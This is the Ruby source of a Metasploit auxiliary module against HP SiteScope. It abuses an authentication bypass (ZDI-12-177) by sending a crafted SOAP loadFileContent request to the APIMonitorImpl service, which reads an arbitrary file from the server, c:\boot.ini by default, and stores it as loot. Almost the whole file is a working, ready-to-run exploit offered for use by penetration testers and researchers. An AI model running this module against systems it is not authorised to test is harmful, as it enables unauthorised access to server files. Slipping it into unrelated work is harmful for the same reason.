metasploit-framework/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit4 < Msf::Auxiliary

	include Msf::Exploit::Remote::HttpClient
	include Msf::Auxiliary::Report
	include Msf::Auxiliary::Scanner

	def initialize
		super(
			'Name'         => 'HP SiteScope SOAP Call loadFileContent Remote File Access',
			'Description'  =>  %q{
					This module exploits an authentication bypass vulnerability in HP SiteScope to
				retrieve an arbitrary text file from the remote server. It is accomplished by
				calling the loadFileContent operation available through the APIMonitorImpl AXIS
				service. This module has been successfully tested on HP SiteScope 11.20 over
				Windows 2003 SP2.
			},
			'References'   =>
				[
					#[ 'OSVDB', '' ],
					[ 'BID', '55269' ],
					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-177/' ]
				],
			'Author'       =>
				[
					'rgod <rgod[at]autistici.org>', # Vulnerability discovery
					'juan vazquez' # Metasploit module
				],
			'License'      => MSF_LICENSE
		)

		register_options(
		[
			Opt::RPORT(8080),
			OptString.new('RFILE', [true, 'Remote File', 'c:\\boot.ini'])

		], self.class)

		register_autofilter_ports([ 8080 ])
		deregister_options('RHOST')
	end

	def rport
		datastore['RPORT']
	end

	def run_host(ip)
		res = send_request_cgi({
			'uri'     => '/SiteScope/services/APIMonitorImpl',
			'method'  => 'GET'})

		if not res
			print_error("#{rhost}:#{rport} - Unable to connect")
			return
		end

		accessfile
	end

	def accessfile
		print_status("#{rhost}:#{rport} - Connecting to SiteScope SOAP Interface")

		data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n"
		data << "<wsns0:Envelope" + "\r\n"
		data << "xmlns:wsns1='http://www.w3.org/2001/XMLSchema-instance'" + "\r\n"
		data << "xmlns:xsd='http://www.w3.org/2001/XMLSchema'" + "\r\n"
		data << "xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/'" + "\r\n"
		data << ">" + "\r\n"
		data << "<wsns0:Body" + "\r\n"
		data << "wsns0:encodingStyle='http://schemas.xmlsoap.org/soap/encoding/'" + "\r\n"
		data << ">" + "\r\n"
		data << "<impl:loadFileContent" + "\r\n"
		data << "xmlns:impl='http://Api.freshtech.COM'" + "\r\n"
		data << ">" + "\r\n"
		data << "<in0" + "\r\n"
		data << "xsi:type='xsd:string'" + "\r\n"
		data << "xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'" + "\r\n"
		data << ">#{datastore['RFILE']}</in0>" + "\r\n"
		data << "</impl:loadFileContent>" + "\r\n"
		data << "</wsns0:Body>" + "\r\n"
		data << "</wsns0:Envelope>" + "\r\n"

		res = send_request_cgi({
			'uri'      => '/SiteScope/services/APIMonitorImpl',
			'method'   => 'POST',
			'ctype'    => 'text/xml; charset=UTF-8',
			'data'     => data,
			'headers'  => {
				'SOAPAction'    => '""',
			}})

		if res and res.code == 200 and res.body =~ /<loadFileContentReturn xsi:type="xsd:string">(.*)<\/loadFileContentReturn>/m
			loot = CGI.unescapeHTML($1)
			if not loot or loot.empty?
				print_status("#{rhost}#{rport} - Retrieved empty file")
				return
			end
			f = ::File.basename(datastore['RFILE'])
			path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])
			print_status("#{rhost}:#{rport} - #{datastore['RFILE']} saved in #{path}")
			return
		end

		print_error("#{rhost}#{rport} - Failed to retrieve file")
	end

end